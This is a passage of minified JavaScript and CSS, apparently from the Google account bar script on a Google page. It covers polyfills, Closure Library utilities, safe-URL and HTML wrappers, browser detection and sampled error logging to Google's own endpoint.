m=l.entries(),q=m.next();if(q.done||q.value[0]!=k||"s"!=q.value[1])return!1;q=m.next();return q.done||4!=q.value[0].x||"t"!=q.value[1]||!m.next().done?!1:!0}catch(v){return!1}}())return a;var b=new WeakMap,c=function(k){this.o={};this.j= f();this.size=0;if(k){k=_.Ua(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}};c.prototype.set=function(k,l){k=0===k?0:k;var m=d(this,k);m.list||(m.list=this.o[m.id]=[]);m.Sa?m.Sa.value=l:(m.Sa={next:this.j,Xb:this.j.Xb,head:this.j,key:k,value:l},m.list.push(m.Sa),this.j.Xb.next=m.Sa,this.j.Xb=m.Sa,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Sa&&k.list?(k.list.splice(k.index,1),k.list.length||delete this.o[k.id],k.Sa.Xb.next=k.Sa.next,k.Sa.next.Xb= k.Sa.Xb,k.Sa.head=null,this.size--,!0):!1};c.prototype.clear=function(){this.o={};this.j=this.j.Xb=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Sa};c.prototype.get=function(k){return(k=d(this,k).Sa)&&k.value};c.prototype.entries=function(){return e(this,function(k){return[k.key,k.value]})};c.prototype.keys=function(){return e(this,function(k){return k.key})};c.prototype.values=function(){return e(this,function(k){return k.value})};c.prototype.forEach=function(k,l){for(var m=this.entries(), q;!(q=m.next()).done;)q=q.value,k.call(l,q[1],q[0],this)};c.prototype[Symbol.iterator]=c.prototype.entries;var d=function(k,l){var m=l&&typeof l;"object"==m||"function"==m?b.has(l)?m=b.get(l):(m=""+ ++g,b.set(l,m)):m="p_"+l;var q=k.o[m];if(q&&bb(k.o,m))for(k=0;k<q.length;k++){var v=q[k];if(l!==l&&v.key!==v.key||l===v.key)return{id:m,list:q,index:k,Sa:v}}return{id:m,list:q,index:-1,Sa:void 0}},e=function(k,l){var m=k.j;return Ta(function(){if(m){for(;m.head!=k.j;)m=m.Xb;for(;m.next!=m.head;)return m= m.next,{done:!1,value:l(m)};m=null}return{done:!0,value:void 0}})},f=function(){var k={};return k.Xb=k.next=k.head=k},g=0;return c});var cb=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[Symbol.iterator]=function(){return e};return e};Sa("Array.prototype.entries",function(a){return a?a:function(){return cb(this,function(b,c){return[b,c]})}}); Sa("Array.prototype.keys",function(a){return a?a:function(){return cb(this,function(b){return b})}});Sa("Number.MAX_SAFE_INTEGER",function(){return 9007199254740991});var db="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)bb(d,e)&&(a[e]=d[e])}return a};Sa("Object.assign",function(a){return a||db});Sa("Array.prototype.values",function(a){return a?a:function(){return cb(this,function(b,c){return c})}}); Sa("Array.from",function(a){return a?a:function(b,c,d){c=null!=c?c:function(k){return k};var e=[],f="undefined"!=typeof Symbol&&Symbol.iterator&&b[Symbol.iterator];if("function"==typeof f){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.call(d,f.value,g++))}else for(f=b.length,g=0;g<f;g++)e.push(c.call(d,b[g],g));return e}});Sa("Object.is",function(a){return a?a:function(b,c){return b===c?0!==b||1/b===1/c:b!==b&&c!==c}}); Sa("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));var e=d.length;c=c||0;for(0>c&&(c=Math.max(c+e,0));c<e;c++){var f=d[c];if(f===b||Object.is(f,b))return!0}return!1}});Sa("String.prototype.includes",function(a){return a?a:function(b,c){return-1!==ab(this,b,"includes").indexOf(b,c||0)}});Sa("Object.entries",function(a){return a?a:function(b){var c=[],d;for(d in b)bb(b,d)&&c.push([d,b[d]]);return c}}); Sa("Array.prototype.fill",function(a){return a?a:function(b,c,d){var e=this.length||0;0>c&&(c=Math.max(0,e+c));if(null==d||d>e)d=e;d=Number(d);0>d&&(d=Math.max(0,e+d));for(c=Number(c||0);c<d;c++)this[c]=b;return this}});var eb=function(a){return a?a:Array.prototype.fill};Sa("Int8Array.prototype.fill",eb);Sa("Uint8Array.prototype.fill",eb);Sa("Uint8ClampedArray.prototype.fill",eb);Sa("Int16Array.prototype.fill",eb);Sa("Uint16Array.prototype.fill",eb);Sa("Int32Array.prototype.fill",eb); Sa("Uint32Array.prototype.fill",eb);Sa("Float32Array.prototype.fill",eb);Sa("Float64Array.prototype.fill",eb); /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var kb,lb,nb,ob,pb;_.fb=_.fb||{};_.n=this||self;_.gb=function(){};_.hb=function(a){var b=typeof a;return"object"!=b?b:a?Array.isArray(a)?"array":b:"null"};_.ib=function(a){var b=_.hb(a);return"array"==b||"object"==b&&"number"==typeof a.length};_.jb=function(a){var b=typeof a;return"object"==b&&null!=a||"function"==b};_.mb=function(a){return Object.prototype.hasOwnProperty.call(a,kb)&&a[kb]||(a[kb]=++lb)};kb="closure_uid_"+(1E9*Math.random()>>>0);lb=0; nb=function(a,b,c){return a.call.apply(a.bind,arguments)};ob=function(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}};_.y=function(a,b,c){Function.prototype.bind&&-1!=Function.prototype.bind.toString().indexOf("native code")?_.y=nb:_.y=ob;return _.y.apply(null,arguments)}; _.z=function(a,b){a=a.split(".");var c=_.n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};_.B=function(a,b){function c(){}c.prototype=b.prototype;a.Y=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Dk=function(d,e,f){for(var g=Array(arguments.length-2),k=2;k<arguments.length;k++)g[k-2]=arguments[k];return b.prototype[e].apply(d,g)}};pb=function(a){return a}; _.qb=function(a){var b=null,c=_.n.trustedTypes;if(!c||!c.createPolicy)return b;try{b=c.createPolicy(a,{createHTML:pb,createScript:pb,createScriptURL:pb})}catch(d){_.n.console&&_.n.console.error(d.message)}return b}; _.B(_.aa,Error);_.aa.prototype.name="CustomError"; _.rb="undefined"!==typeof TextDecoder;_.sb="undefined"!==typeof TextEncoder; _.tb=String.prototype.trim?function(a){return a.trim()}:function(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]}; _.ub=Array.prototype.indexOf?function(a,b){return Array.prototype.indexOf.call(a,b,void 0)}:function(a,b){if("string"===typeof a)return"string"!==typeof b||1!=b.length?-1:a.indexOf(b,0);for(var c=0;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1};_.vb=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e="string"===typeof a?a.split(""):a,f=0;f<d;f++)f in e&&b.call(c,e[f],f,a)}; _.wb=Array.prototype.filter?function(a,b,c){return Array.prototype.filter.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=[],f=0,g="string"===typeof a?a.split(""):a,k=0;k<d;k++)if(k in g){var l=g[k];b.call(c,l,k,a)&&(e[f++]=l)}return e};_.xb=Array.prototype.map?function(a,b,c){return Array.prototype.map.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=Array(d),f="string"===typeof a?a.split(""):a,g=0;g<d;g++)g in f&&(e[g]=b.call(c,f[g],g,a));return e}; _.yb=Array.prototype.reduce?function(a,b,c){return Array.prototype.reduce.call(a,b,c)}:function(a,b,c){var d=c;(0,_.vb)(a,function(e,f){d=b.call(void 0,d,e,f,a)});return d};_.zb=Array.prototype.some?function(a,b){return Array.prototype.some.call(a,b,void 0)}:function(a,b){for(var c=a.length,d="string"===typeof a?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;return!1}; _.Ab=function(a){_.Ab[" "](a);return a};_.Ab[" "]=_.gb; var Pb,Qb,Vb;_.Bb=_.ca();_.C=_.da();_.Cb=_.p("Edge");_.Db=_.Cb||_.C;_.Eb=_.p("Gecko")&&!_.ma()&&!(_.p("Trident")||_.p("MSIE"))&&!_.p("Edge");_.Gb=_.ma();_.Hb=_.p("Macintosh");_.Ib=_.p("Windows");_.Jb=_.p("Linux")||_.p("CrOS");_.Kb=_.p("Android");_.Lb=ja();_.Mb=_.p("iPad");_.Nb=_.p("iPod");_.Ob=_.ka();Pb=function(){var a=_.n.document;return a?a.documentMode:void 0}; a:{var Rb="",Sb=function(){var a=_.ba();if(_.Eb)return/rv:([^\);]+)(\)|;)/.exec(a);if(_.Cb)return/Edge\/([\d\.]+)/.exec(a);if(_.C)return/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a);if(_.Gb)return/WebKit\/(\S+)/.exec(a);if(_.Bb)return/(?:Version)[ \/]?(\S+)/.exec(a)}();Sb&&(Rb=Sb?Sb[1]:"");if(_.C){var Tb=Pb();if(null!=Tb&&Tb>parseFloat(Rb)){Qb=String(Tb);break a}}Qb=Rb}_.Ub=Qb;if(_.n.document&&_.C){var Wb=Pb();Vb=Wb?Wb:parseInt(_.Ub,10)||void 0}else Vb=void 0;_.Xb=Vb; _.Yb=_.ea();_.Zb=ja()||_.p("iPod");_.$b=_.p("iPad");_.ac=_.ia();_.bc=_.fa();_.cc=_.ha()&&!_.ka(); var dc;dc={};_.ec=null;_.za=function(a){var b;void 0===b&&(b=0);_.fc();b=dc[b];for(var c=Array(Math.floor(a.length/3)),d=b[64]||"",e=0,f=0;e<a.length-2;e+=3){var g=a[e],k=a[e+1],l=a[e+2],m=b[g>>2];g=b[(g&3)<<4|k>>4];k=b[(k&15)<<2|l>>6];l=b[l&63];c[f++]=m+g+k+l}m=0;l=d;switch(a.length-e){case 2:m=a[e+1],l=b[(m&15)<<2]||d;case 1:a=a[e],c[f]=b[a>>2]+b[(a&3)<<4|m>>4]+l+d}return c.join("")}; _.fc=function(){if(!_.ec){_.ec={};for(var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".split(""),b=["+/=","+/","-_=","-_.","-_"],c=0;5>c;c++){var d=a.concat(b[c].split(""));dc[c]=d;for(var e=0;e<d.length;e++){var f=d[e];void 0===_.ec[f]&&(_.ec[f]=e)}}}}; _.oa="function"===typeof Uint8Array; _.gc="function"===typeof Uint8Array.prototype.slice; var qa="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol(void 0):void 0; var kc;_.ic=Object.freeze(_.ta([]));_.jc=function(a){if(ua(a.Ea))throw Error("w");};kc="undefined"!=typeof Symbol&&"undefined"!=typeof Symbol.hasInstance; _.D=function(a,b,c){return-1===b?null:b>=a.B?a.o?a.o[b]:void 0:(void 0===c?0:c)&&a.o&&(c=a.o[b],null!=c)?c:a.Ea[b+a.A]};_.E=function(a,b,c,d,e){d=void 0===d?!1:d;(void 0===e?0:e)||_.jc(a);b<a.B&&!d?a.Ea[b+a.A]=c:(a.o||(a.o=a.Ea[a.B+a.A]={}))[b]=c;return a};_.lc=function(a,b){return null!=_.D(a,b)};_.mc=function(a,b,c,d){c=void 0===c?!0:c;d=void 0===d?!1:d;var e=_.D(a,b,d);null==e&&(e=_.ic);if(ua(a.Ea))c&&(va(e),Object.freeze(e));else if(e===_.ic||ua(e))e=_.ta(e.slice()),_.E(a,b,e,d);return e}; _.F=function(a,b){a=_.D(a,b);return null==a?a:!!a};_.nc=function(a,b,c){a=_.D(a,b);return null==a?c:a};_.oc=function(a,b,c){a=_.D(a,b);a=null==a?a:+a;return null==a?void 0===c?0:c:a};_.r=function(a,b,c,d,e){if(-1===c)return null;a.j||(a.j={});var f=a.j[c];if(f)return f;e=_.D(a,c,void 0===e?!1:e);if(null==e&&!d)return f;b=new b(e);ua(a.Ea)&&va(b.Ea);return a.j[c]=b}; _.Ha=function(a,b,c,d){a.j||(a.j={});var e=ua(a.Ea),f=a.j[c];if(!f){d=_.mc(a,c,!0,void 0===d?!1:d);f=[];e=e||ua(d);for(var g=0;g<d.length;g++)f[g]=new b(d[g]),e&&va(f[g].Ea);e&&(va(f),Object.freeze(f));a.j[c]=f}return f};_.pc=function(a,b,c){var d=void 0===d?!1:d;_.jc(a);a.j||(a.j={});var e=c?c.Ea:c;a.j[b]=c;return _.E(a,b,e,d)};_.qc=function(a,b,c){return _.nc(a,b,void 0===c?0:c)}; var sc=function(a,b,c){a||(a=_.rc);_.rc=null;var d=this.constructor.j;a||(a=d?[d]:[]);this.A=(d?0:-1)-(this.constructor.o||0);this.j=void 0;this.Ea=a;a:{d=this.Ea.length;a=d-1;if(d&&(d=this.Ea[a],wa(d))){this.B=a-this.A;this.o=d;break a}void 0!==b&&-1<b?(this.B=Math.max(b,a+1-this.A),this.o=void 0):this.B=Number.MAX_VALUE}if(c)for(b=0;b<c.length;b++)if(a=c[b],a<this.B)a+=this.A,(d=this.Ea[a])?Array.isArray(d)&&_.ta(d):this.Ea[a]=_.ic;else{d=this.o||(this.o=this.Ea[this.B+this.A]={});var e=d[a];e? Array.isArray(e)&&_.ta(e):d[a]=_.ic}};sc.prototype.toJSON=function(){var a=this.Ea;return _.hc?a:Ea(a,Ga)};sc.prototype.clone=function(){var a=Ea(this.Ea);_.rc=a;a=new this.constructor(a);_.rc=null;Ia(a,this);return a};sc.prototype.toString=function(){return this.Ea.toString()}; var tc=function(){sc.apply(this,arguments)};_.w(tc,sc);if(kc){var uc={};Object.defineProperties(tc,(uc[Symbol.hasInstance]=xa(function(){throw Error("z");}),uc))} ;_.vc=Symbol();_.wc=Symbol();_.xc=Symbol();_.yc=Symbol(); _.G=function(){tc.apply(this,arguments)};_.w(_.G,tc);if(kc){var zc={};Object.defineProperties(_.G,(zc[Symbol.hasInstance]=xa(Object[Symbol.hasInstance]),zc))} ;var Ac=function(a){_.G.call(this,a)};_.w(Ac,_.G); _.Bc=function(a){_.G.call(this,a)};_.w(_.Bc,_.G);_.Bc.prototype.Kc=function(a){return _.E(this,3,a)}; var Cc=function(a){_.G.call(this,a)};_.w(Cc,_.G); _.Dc=function(a){_.G.call(this,a)};_.w(_.Dc,_.G);_.Dc.prototype.af=function(a){return _.E(this,24,a)}; _.Ec=function(a){_.G.call(this,a)};_.w(_.Ec,_.G); _.H=function(){this.Kb=this.Kb;this.Qa=this.Qa};_.H.prototype.Kb=!1;_.H.prototype.isDisposed=function(){return this.Kb};_.H.prototype.oa=function(){this.Kb||(this.Kb=!0,this.R())};_.H.prototype.R=function(){if(this.Qa)for(;this.Qa.length;)this.Qa.shift()()}; var Fc=function(a){_.H.call(this);this.A=a;this.j=[];this.o={}};_.w(Fc,_.H);Fc.prototype.resolve=function(a){var b=this.A;a=a.split(".");for(var c=a.length,d=0;d<c;++d)if(b[a[d]])b=b[a[d]];else return null;return b instanceof Function?b:null};Fc.prototype.hd=function(){for(var a=this.j.length,b=this.j,c=[],d=0;d<a;++d){var e=b[d].j(),f=this.resolve(e);if(f&&f!=this.o[e])try{b[d].hd(f)}catch(g){}else c.push(b[d])}this.j=c.concat(b.slice(a))}; var Gc=function(a){_.H.call(this);this.A=a;this.C=this.j=null;this.B=0;this.D={};this.o=!1;a=window.navigator.userAgent;0<=a.indexOf("MSIE")&&0<=a.indexOf("Trident")&&(a=/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a))&&a[1]&&9>parseFloat(a[1])&&(this.o=!0)};_.w(Gc,_.H);Gc.prototype.F=function(a,b){this.j=b;this.C=a;b.preventDefault?b.preventDefault():b.returnValue=!1}; _.Hc=function(a){_.G.call(this,a)};_.w(_.Hc,_.G); _.Ic=function(a){_.G.call(this,a)};_.w(_.Ic,_.G); _.Jc=function(){this.data={}};_.Jc.prototype.o=function(){window.console&&window.console.log&&window.console.log("Log data: ",this.data)};_.Jc.prototype.j=function(a){var b=[],c;for(c in this.data)b.push(encodeURIComponent(c)+"="+encodeURIComponent(String(this.data[c])));return("atyp=i&zx="+(new Date).getTime()+"&"+b.join("&")).substr(0,a)}; var Kc=function(a,b){this.data={};var c=_.r(a,Cc,8)||new Cc;window.google&&window.google.kEI&&(this.data.ei=window.google.kEI);this.data.sei=_.u(_.D(a,10));this.data.ogf=_.u(_.D(c,3));this.data.ogrp=(window.google&&window.google.sn?!/.*hp$/.test(window.google.sn):_.t(_.F(a,7)))?"1":"";this.data.ogv=_.u(_.D(c,6))+"."+_.u(_.D(c,7));this.data.ogd=_.u(_.D(a,21));this.data.ogc=_.u(_.D(a,20));this.data.ogl=_.u(_.D(a,5));b&&(this.data.oggv=b)};_.w(Kc,_.Jc); var Ma="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" "); _.Lc=function(a,b,c,d,e){Kc.call(this,a,b);_.Na(this.data,{jexpid:_.u(_.D(a,9)),srcpg:"prop="+_.u(_.D(a,6)),jsr:Math.round(1/d),emsg:c.name+":"+c.message});if(e){e._sn&&(e._sn="og."+e._sn);for(var f in e)this.data[encodeURIComponent(f)]=e[f]}};_.w(_.Lc,Kc); var Mc;_.Nc=function(){void 0===Mc&&(Mc=_.qb("ogb-qtm#html"));return Mc}; var Oc;_.Pc=function(a,b){this.j=b===Oc?a:""};_.h=_.Pc.prototype;_.h.Nb=!0;_.h.nb=function(){return this.j.toString()};_.h.Ee=!0;_.h.oc=function(){return 1};_.h.toString=function(){return this.j+""};_.Rc=function(a){return _.Qc(a).toString()};_.Qc=function(a){return a instanceof _.Pc&&a.constructor===_.Pc?a.j:"type_error:TrustedResourceUrl"};Oc={};_.Sc=function(a){var b=_.Nc();a=b?b.createScriptURL(a):a;return new _.Pc(a,Oc)}; var Wc,Xc,Tc;_.Uc=function(a,b){this.j=b===Tc?a:""};_.h=_.Uc.prototype;_.h.Nb=!0;_.h.nb=function(){return this.j.toString()};_.h.Ee=!0;_.h.oc=function(){return 1};_.h.toString=function(){return this.j.toString()};_.Vc=function(a){return a instanceof _.Uc&&a.constructor===_.Uc?a.j:"type_error:SafeUrl"};Wc=/^data:(.*);base64,[a-z0-9+\/]+=*$/i;Xc=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i; _.Zc=function(a){if(a instanceof _.Uc)return a;a="object"==typeof a&&a.Nb?a.nb():String(a);Xc.test(a)?a=_.Yc(a):(a=String(a),a=a.replace(/(%0A|%0D)/g,""),a=a.match(Wc)?_.Yc(a):null);return a};_.$c=function(a){if(a instanceof _.Uc)return a;a="object"==typeof a&&a.Nb?a.nb():String(a);Xc.test(a)||(a="about:invalid#zClosurez");return _.Yc(a)};Tc={};_.Yc=function(a){return new _.Uc(a,Tc)};_.ad=_.Yc("about:invalid#zClosurez"); _.bd={};_.cd=function(a,b){this.j=b===_.bd?a:"";this.Nb=!0};_.cd.prototype.nb=function(){return this.j};_.cd.prototype.toString=function(){return this.j.toString()};_.dd=new _.cd("",_.bd);_.ed=RegExp("^[-,.\"'%_!#/ a-zA-Z0-9\\[\\]]+$");_.fd=RegExp("\\b(url\\([ \t\n]*)('[ -&(-\\[\\]-~]*'|\"[ !#-\\[\\]-~]*\"|[!#-&*-\\[\\]-~]*)([ \t\n]*\\))","g"); _.gd=RegExp("\\b(calc|cubic-bezier|fit-content|hsl|hsla|linear-gradient|matrix|minmax|radial-gradient|repeat|rgb|rgba|(rotate|scale|translate)(X|Y|Z|3d)?|var)\\([-+*/0-9a-zA-Z.%#\\[\\], ]+\\)","g"); var hd;hd={};_.id=function(a,b,c){this.j=c===hd?a:"";this.o=b;this.Nb=this.Ee=!0};_.id.prototype.oc=function(){return this.o};_.id.prototype.nb=function(){return this.j.toString()};_.id.prototype.toString=function(){return this.j.toString()};_.jd=function(a){return a instanceof _.id&&a.constructor===_.id?a.j:"type_error:SafeHtml"};_.kd=function(a,b){var c=_.Nc();a=c?c.createHTML(a):a;return new _.id(a,b,hd)};_.ld=new _.id(_.n.trustedTypes&&_.n.trustedTypes.emptyHTML||"",0,hd);_.md=_.kd("<br>",0); var od;_.nd=function(a){var b=!1,c;return function(){b||(c=a(),b=!0);return c}}(function(){var a=document.createElement("div"),b=document.createElement("div");b.appendChild(document.createElement("div"));a.appendChild(b);b=a.firstChild.firstChild;a.innerHTML=_.jd(_.ld);return!b.parentElement});od=/^[\w+/_-]+[=]{0,2}$/; _.pd=function(a){a=(a||_.n).document;return a.querySelector?(a=a.querySelector('style[nonce],link[rel="stylesheet"][nonce]'))&&(a=a.nonce||a.getAttribute("nonce"))&&od.test(a)?a:"":""}; _.qd=RegExp("^\\s{3,4}at(?: (?:(.*?)\\.)?((?:new )?(?:[a-zA-Z_$][\\w$]*|<anonymous>))(?: \\[as ([a-zA-Z_$][\\w$]*)\\])?)? (?:\\(unknown source\\)|\\(native\\)|\\((?:eval at )?((?:http|https|file)://[^\\s)]+|javascript:.*)\\)|((?:http|https|file)://[^\\s)]+|javascript:.*))$");_.rd=RegExp("^(?:(.*?)\\.)?([a-zA-Z_$][\\w$]*(?:/.?<)?)?(\\(.*\\))?@(?::0|((?:http|https|file)://[^\\s)]+|javascript:.*))$"); var sd,vd,ud;_.td=function(a){var b=window.google&&window.google.logUrl?"":"https://www.google.com";b+="/gen_204?use_corp=on&";b+=a.j(2040-b.length);sd(_.Zc(b)||_.ad)};sd=function(a){var b=new Image,c=ud;b.onerror=b.onload=b.onabort=function(){c in vd&&delete vd[c]};vd[ud++]=b;b.src=_.Vc(a)};vd=[];ud=0; _.wd=function(a){_.G.call(this,a)};_.w(_.wd,_.G); _.xd=function(a){var b="uc";if(a.uc&&a.hasOwnProperty(b))return a.uc;b=new a;return a.uc=b}; _.yd=function(){this.j={};this.o={}};_.Ad=function(a,b){var c=_.yd.j();if(a in c.j){if(c.j[a]!=b)throw new zd(a);}else{c.j[a]=b;if(b=c.o[a])for(var d=0,e=b.length;d<e;d++)b[d].j(c.j,a);delete c.o[a]}};_.Cd=function(a,b){if(b in a.j)return a.j[b];throw new Bd(b);};_.yd.j=function(){return _.xd(_.yd)};var Dd=function(){_.aa.call(this)};_.w(Dd,_.aa);var zd=function(){_.aa.call(this)};_.w(zd,Dd);var Bd=function(){_.aa.call(this)};_.w(Bd,Dd); var Gd=function(){var a=Ed;this.C=Fd;this.o=_.Ja(_.oc(a,2,.001),.001);this.D=_.t(_.F(a,1))&&Math.random()<this.o;this.F=_.Ja(_.qc(a,3,1),1);this.B=0;this.j=this.A=null};Gd.prototype.log=function(a,b){if(this.j){var c=new Ac;_.E(c,1,a.message);_.E(c,2,a.stack);_.E(c,3,a.lineNumber);_.E(c,5,1);var d=new _.Bc;_.pc(d,40,c);this.j.log(98,d)}try{if(this.D&&this.B<this.F){try{var e=(this.A||_.Cd(_.yd.j(),"lm")).B(a,b)}catch(f){e=new _.Lc(this.C,"quantum:gapiBuildLabel",a,this.o,b)}_.td(e);this.B++}}catch(f){}}; var Hd=[1,2,3,4,5,6,9,10,11,13,14,28,29,30,34,35,37,38,39,40,42,43,48,49,50,51,52,53,62,500],Kd=function(a,b,c,d,e,f){Kc.call(this,a,b);_.Na(this.data,{oge:d,ogex:_.u(_.D(a,9)),ogp:_.u(_.D(a,6)),ogsr:Math.round(1/(Id(d)?_.Ja(_.oc(c,3,1)):_.Ja(_.oc(c,2,1E-4)))),ogus:e});if(f){"ogw"in f&&(this.data.ogw=f.ogw,delete f.ogw);"ved"in f&&(this.data.ved=f.ved,delete f.ved);a=[];for(var g in f)0!=a.length&&a.push(","),a.push(Jd(g)),a.push("."),a.push(Jd(f[g]));f=a.join("");""!=f&&(this.data.ogad=f)}}; _.w(Kd,Kc);var Jd=function(a){a=String(a);return a.replace(".","%2E").replace(",","%2C")},Id=function(a){if(!Ld){Ld={};for(var b=0;b<Hd.length;b++)Ld[Hd[b]]=!0}return!!Ld[a]},Ld=null; var Md=function(a){_.G.call(this,a)};_.w(Md,_.G); var Qd=function(){var a=Nd,b=Od,c=Pd;this.o=a;this.j=b;this.B=_.Ja(_.oc(a,2,1E-4),1E-4);this.D=_.Ja(_.oc(a,3,1),1);b=Math.random();this.A=_.t(_.F(a,1))&&b<this.B;this.C=_.t(_.F(a,1))&&b<this.D;a=0;_.t(_.F(c,1))&&(a|=1);_.t(_.F(c,2))&&(a|=2);_.t(_.F(c,3))&&(a|=4);this.F=a};Qd.prototype.log=function(a,b){try{if(Id(a)?this.C:this.A){var c=new Kd(this.j,"quantum:gapiBuildLabel",this.o,a,this.F,b);_.td(c)}}catch(d){}}; _.Rd=function(a){this.ua=a;this.j=void 0;this.o=[]};_.Rd.prototype.then=function(a,b,c){this.o.push(new Sd(a,b,c));Td(this)};_.Rd.prototype.resolve=function(a){if(void 0!==this.ua||void 0!==this.j)throw Error("H");this.ua=a;Td(this)};_.Rd.prototype.reject=function(a){if(void 0!==this.ua||void 0!==this.j)throw Error("H");this.j=a;Td(this)};var Td=function(a){if(0<a.o.length){var b=void 0!==a.ua,c=void 0!==a.j;if(b||c){b=b?a.A:a.B;c=a.o;a.o=[];try{_.vb(c,b,a)}catch(d){console.error(d)}}}}; _.Rd.prototype.A=function(a){a.o&&a.o.call(a.j,this.ua)};_.Rd.prototype.B=function(a){a.A&&a.A.call(a.j,this.j)};var Sd=function(a,b,c){this.o=a;this.A=b;this.j=c}; _.I=function(){this.B=new _.Rd;this.j=new _.Rd;this.G=new _.Rd;this.D=new _.Rd;this.F=new _.Rd;this.H=new _.Rd;this.C=new _.Rd;this.A=new _.Rd;this.o=new _.Rd;this.K=new _.Rd};_.h=_.I.prototype;_.h.Ph=function(){return this.B};_.h.Xh=function(){return this.j};_.h.hi=function(){return this.G};_.h.Wh=function(){return this.D};_.h.di=function(){return this.F};_.h.Th=function(){return this.H};_.h.Uh=function(){return this.C};_.h.Jh=function(){return this.A};_.h.Ih=function(){return this.o};_.I.j=function(){return _.xd(_.I)}; var Ud=function(a){_.G.call(this,a)};_.w(Ud,_.G);_.Wd=function(){return _.r(_.Vd,_.Dc,1)};_.Xd=function(){return _.r(_.Vd,_.Ec,5)}; var Yd;window.gbar_&&window.gbar_.CONFIG?Yd=window.gbar_.CONFIG[0]||{}:Yd=[];_.Vd=new Ud(Yd); var Ed,Fd,Od,Pd,Nd;Ed=_.r(_.Vd,_.wd,3)||new _.wd;Fd=_.Wd()||new _.Dc;_.J=new Gd;Od=_.Wd()||new _.Dc;Pd=_.Xd()||new _.Ec;Nd=_.r(_.Vd,Md,4)||new Md;_.Zd=new Qd; _.z("gbar_._DumpException",function(a){_.J?_.J.log(a):console.error(a)}); _.$d=new Gc(_.J); _.Zd.log(8,{m:"BackCompat"==document.compatMode?"q":"s"});_.z("gbar.A",_.Rd);_.Rd.prototype.aa=_.Rd.prototype.then;_.z("gbar.B",_.I);_.I.prototype.ba=_.I.prototype.Xh;_.I.prototype.bb=_.I.prototype.hi;_.I.prototype.bd=_.I.prototype.di;_.I.prototype.bf=_.I.prototype.Ph;_.I.prototype.bg=_.I.prototype.Wh;_.I.prototype.bh=_.I.prototype.Th;_.I.prototype.bi=_.I.prototype.Uh;_.I.prototype.bj=_.I.prototype.Jh;_.I.prototype.bk=_.I.prototype.Ih;_.z("gbar.a",_.I.j());var ae=new Fc(window);_.Ad("api",ae); var be=_.Xd()||new _.Ec;window.__PVT=_.u(_.D(be,8));_.Ad("eq",_.$d); }catch(e){_._DumpException(e)} try{ var ce=function(a){_.G.call(this,a)};_.w(ce,_.G); var de=function(){_.H.call(this);this.o=[];this.j=[]};_.w(de,_.H);de.prototype.A=function(a,b){this.o.push({features:a,options:b})};de.prototype.init=function(a,b,c){window.gapi={};var d=window.___jsl={};d.h=_.u(_.D(a,1));_.lc(a,12)&&(d.dpo=_.t(_.F(a,12)));d.ms=_.u(_.D(a,2));d.m=_.u(_.D(a,3));d.l=[];_.D(b,1)&&(a=_.D(b,3))&&this.j.push(a);_.D(c,1)&&(c=_.D(c,2))&&this.j.push(c);_.z("gapi.load",(0,_.y)(this.A,this));return this}; var ee=_.r(_.Vd,_.Hc,14)||new _.Hc,fe=_.r(_.Vd,_.Ic,9)||new _.Ic,ge=new ce,he=new de;he.init(ee,fe,ge);_.Ad("gs",he); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. </script><style>h1,ol,ul,li,button{margin:0;padding:0}button{border:none;background:none}body{background:#fff}body,input,button{font-size:14px;font-family:arial,sans-serif;color:#202124}a{color:#1a0dab;text-decoration:none}a:hover,a:active{text-decoration:underline}a:visited{color:#609}html,body{min-width:400px}body,html{height:100%;margin:0;padding:0}.gb_Za:not(.gb_Ed){font:13px/27px Roboto,RobotoDraft,Arial,sans-serif;z-index:986}@-moz-keyframes gb__a{0%{opacity:0}50%{opacity:1}}@keyframes gb__a{0%{opacity:0}50%{opacity:1}}a.gb_W{border:none;color:#4285f4;cursor:default;font-weight:bold;outline:none;position:relative;text-align:center;text-decoration:none;text-transform:uppercase;white-space:nowrap;-moz-user-select:none}a.gb_W:hover:after,a.gb_W:focus:after{background-color:rgba(0,0,0,.12);content:'';height:100%;left:0;position:absolute;top:0;width:100%}a.gb_W:hover,a.gb_W:focus{text-decoration:none}a.gb_W:active{background-color:rgba(153,153,153,.4);text-decoration:none}a.gb_X{background-color:#4285f4;color:#fff}a.gb_X:active{background-color:#0043b2}.gb_Z{-moz-box-shadow:0 1px 1px rgba(0,0,0,.16);box-shadow:0 1px 1px rgba(0,0,0,.16)}.gb_W,.gb_X,.gb_0,.gb_1{display:inline-block;line-height:28px;padding:0 12px;-moz-border-radius:2px;border-radius:2px}.gb_0{background:#f8f8f8;border:1px solid 